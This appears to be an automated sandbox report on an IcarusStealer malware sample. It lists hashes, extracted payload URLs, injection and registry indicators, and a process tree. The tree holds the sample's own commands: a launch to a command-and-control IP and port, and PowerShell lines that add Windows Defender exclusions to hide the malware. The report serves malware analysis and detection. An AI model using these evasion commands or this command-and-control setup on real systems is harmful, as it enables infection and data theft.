icarusstealer | 5422c44ddaea8b411bd457cd24c33c1c1fa8eed02dbdb35338da412f2be1dd33

Analysis

max time kernel
142s
max time network
167s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10/03/2024, 01:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

02d13710a5a788759319df4d64b95c17.exe
Size

494KB
MD5

02d13710a5a788759319df4d64b95c17
SHA1

166121845fb2f40cc9febc35dea432696e388bec
SHA256

5422c44ddaea8b411bd457cd24c33c1c1fa8eed02dbdb35338da412f2be1dd33
SHA512

0a0a9c7ef30d0d3e71141684e796cfc78eb9d4689e37ae6d66123dfdd8a12df55dd424c47cd1d75068c6b8ff16512da2d607b69a6bc6cbcfba01b8063311171c
SSDEEP

12288:zhGwluLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+QY:VBZ6N6LqQzJqk/

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2252 set thread context of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	30

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2924	powershell.exe
2060	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeDebugPrivilege	2504	cvtres.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe

Suspicious use of SendNotifyMessage 17 IoCs

pid	Process
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2252 wrote to memory of 1744	2252	02d13710a5a788759319df4d64b95c17.exe	29
PID 2252 wrote to memory of 1744	2252	02d13710a5a788759319df4d64b95c17.exe	29
PID 2252 wrote to memory of 1744	2252	02d13710a5a788759319df4d64b95c17.exe	29
PID 2252 wrote to memory of 1744	2252	02d13710a5a788759319df4d64b95c17.exe	29
PID 1744 wrote to memory of 2980	1744	explorer.exe	31
PID 1744 wrote to memory of 2980	1744	explorer.exe	31
PID 1744 wrote to memory of 2980	1744	explorer.exe	31
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	30
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	30
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	30
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	30
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	30
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	30
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	30
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	30
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	30
PID 2504 wrote to memory of 2492	2504	cvtres.exe	32
PID 2504 wrote to memory of 2492	2504	cvtres.exe	32
PID 2504 wrote to memory of 2492	2504	cvtres.exe	32
PID 2504 wrote to memory of 2492	2504	cvtres.exe	32
PID 2504 wrote to memory of 2956	2504	cvtres.exe	34
PID 2504 wrote to memory of 2956	2504	cvtres.exe	34
PID 2504 wrote to memory of 2956	2504	cvtres.exe	34
PID 2504 wrote to memory of 2956	2504	cvtres.exe	34
PID 2492 wrote to memory of 2060	2492	cmd.exe	36
PID 2492 wrote to memory of 2060	2492	cmd.exe	36
PID 2492 wrote to memory of 2060	2492	cmd.exe	36
PID 2492 wrote to memory of 2060	2492	cmd.exe	36
PID 2956 wrote to memory of 2924	2956	cmd.exe	37
PID 2956 wrote to memory of 2924	2956	cmd.exe	37
PID 2956 wrote to memory of 2924	2956	cmd.exe	37
PID 2956 wrote to memory of 2924	2956	cmd.exe	37

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\02d13710a5a788759319df4d64b95c17.exe
"C:\Users\Admin\AppData\Local\Temp\02d13710a5a788759319df4d64b95c17.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2252
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies Installed Components in the registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1744
- - C:\Windows\system32\ctfmon.exe
    ctfmon.exe
    3⤵
    PID:2980
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 147.185.221.17 22817 vUiuCXqqM
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2492
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2060
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2956
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
1400b8c22aede020e85aa9888a10fc61

SHA1
203eb8eb6d28c15a79b0f6144ba776462239c138

SHA256
70107ae78bf57a5490a6ea39e27166e5c8e05d0ea8d81fd913316d966c7bcca1

SHA512
84782f6da2d2f1dd5d98c90b04fae37511d29944e741fa2c7b53069f97c78482ae7f59dbb2a17456f320393f5e01e1a243cafab7e5d8a943cd5870f0ea806d7d

Download Submit
memory/1744-42-0x0000000002650000-0x0000000002660000-memory.dmp

Filesize
64KB

Download
memory/1744-38-0x0000000003F60000-0x0000000003F61000-memory.dmp

Filesize
4KB

Download
memory/1744-33-0x0000000003F60000-0x0000000003F61000-memory.dmp

Filesize
4KB

Download
memory/2060-31-0x0000000001F90000-0x0000000001FD0000-memory.dmp

Filesize
256KB

Download
memory/2060-25-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download
memory/2060-35-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download
memory/2060-29-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download
memory/2060-30-0x0000000001F90000-0x0000000001FD0000-memory.dmp

Filesize
256KB

Download
memory/2060-27-0x0000000001F90000-0x0000000001FD0000-memory.dmp

Filesize
256KB

Download
memory/2252-1-0x00000000748F0000-0x0000000074FDE000-memory.dmp

Filesize
6.9MB

Download
memory/2252-2-0x0000000004C20000-0x0000000004C60000-memory.dmp

Filesize
256KB

Download
memory/2252-12-0x00000000748F0000-0x0000000074FDE000-memory.dmp

Filesize
6.9MB

Download
memory/2252-0-0x0000000000C80000-0x0000000000D02000-memory.dmp

Filesize
520KB

Download
memory/2504-3-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-13-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-17-0x0000000004BE0000-0x0000000004C20000-memory.dmp

Filesize
256KB

Download
memory/2504-10-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-16-0x0000000074200000-0x00000000748EE000-memory.dmp

Filesize
6.9MB

Download
memory/2504-15-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-9-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2504-4-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-37-0x0000000004BE0000-0x0000000004C20000-memory.dmp

Filesize
256KB

Download
memory/2504-5-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-7-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-36-0x0000000074200000-0x00000000748EE000-memory.dmp

Filesize
6.9MB

Download
memory/2924-34-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download
memory/2924-32-0x0000000000820000-0x0000000000860000-memory.dmp

Filesize
256KB

Download
memory/2924-28-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download
memory/2924-26-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download